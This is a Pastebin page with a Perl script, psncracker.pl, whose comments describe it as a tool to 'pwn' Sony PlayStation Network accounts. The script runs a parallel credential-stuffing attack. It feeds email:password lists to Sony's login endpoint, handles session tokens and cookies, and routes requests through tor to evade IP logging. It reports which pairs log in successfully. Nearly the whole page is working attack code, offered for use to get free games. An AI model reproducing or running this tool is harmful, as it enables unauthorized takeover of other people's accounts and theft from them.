Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # Used to pwn Sony Playstation Network. Must have a valid list of psn users emails.
- #
- # Use at your own risk...
- # Must have tsocks and tor installed tested only in linux
- # ./psncracker.pl seplistfile 16
- # Really just a simple brute force tool designed to accept cookies, manipulate the token
- # and use tor as a distributed proxy network aimed at sony's network. You could use any
- # randomizing proxy to circumvent the IP logging tho I suppose.
- # Lists should look like:
- # psnemail@whatever.com:password
- # Enjoy free games, if you're a fool, cuz sony will have your ass if you get caught using this.
- # oxagast
- use Parallel::ForkManager;
- use List::Util 'shuffle';
- @list2 = `cat @ARGV[0]`;
- @list = shuffle(@list2);
- @list2 = "";
- my $pm = new Parallel::ForkManager(@ARGV[1]);
- for $cur (0..scalar(@list)-1) {
- $pm->start and next;
- @emailpass = "";
- @emailpass = split(/:/, @list[$cur]);
- chomp @emailpass;
- system ('tsocks curl --header "User-Agent: Mozilla/5.0" --header "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" --header "Accept-Language: en-us,en;q=0.5" --header "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" "https://account.sonyentertainmentnetwork.com/pc/login.action" --location-trusted --cookie-jar cookies$cur.txt -s > stuff1' . $cur);
- system ('cat adtrackercookies.txt3 >> cookies' . $cur . '.txt');
- $sys10 = ('tsocks curl --header "Host: account.sonyentertainmentnetwork.com" --header "User-Agent: Mozilla/5.0 (Ubuntu; X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" --header "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" --header "Accept-Language: en-us,en;q=0.5" --header "Accept-Encoding: gzip, deflate" --header "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" --header "Connection: keep-alive" "https://account.sonyentertainmentnetwork.com/pc/j_spring_security_check" --cookie cookies' . $cur . '.txt --cookie-jar cookies2' . $cur . '.txt -L --form-string struts.token.name=struts.token --form-string struts.token=$(cat stuff1' . $cur . ' | grep struts.token | grep tvId | cut -b -80 | sed s/^.*value=\"//) --form-string j_username=');
- $sys11 = (' --form-string j_password=');
- $sys12 = (' --form-string service-entity=np -L -s > stuff2' . $cur);
- $sys13 = ('tsocks curl --header "User-Agent: Mozilla/5.0" --header "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" --header "Accept-Language: en-us,en;q=0.5" --header "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" --cookie cookies2' . $cur . '.txt "https://account.sonyentertainmentnetwork.com/pc/cam/devices/device-list.action?&category=" --location-trusted -s > stuff3' . $cur);
- system("$sys10@emailpass[0]$sys11@emailpass[1]$sys12");
- system("$sys13");
- unlink("cookies$cur.txt");
- unlink("stuff2$cur");
- unlink("stuff1$cur");
- $lastpage = `cat stuff3$cur`;
- unlink("stuff3$cur");
- if ($lastpage !~ m/@emailpass[0]/s) {
- print "TESTING: @emailpass[0]:@emailpass[1]\n";
- }
- if ($lastpage =~ m/@emailpass[0]/s) {
- print "FOUND: @emailpass[0]:@emailpass[1]\n";
- }
- $pm->finish;
- }
- $pm->wait_all_children;
Add Comment
Please, Sign In to add comment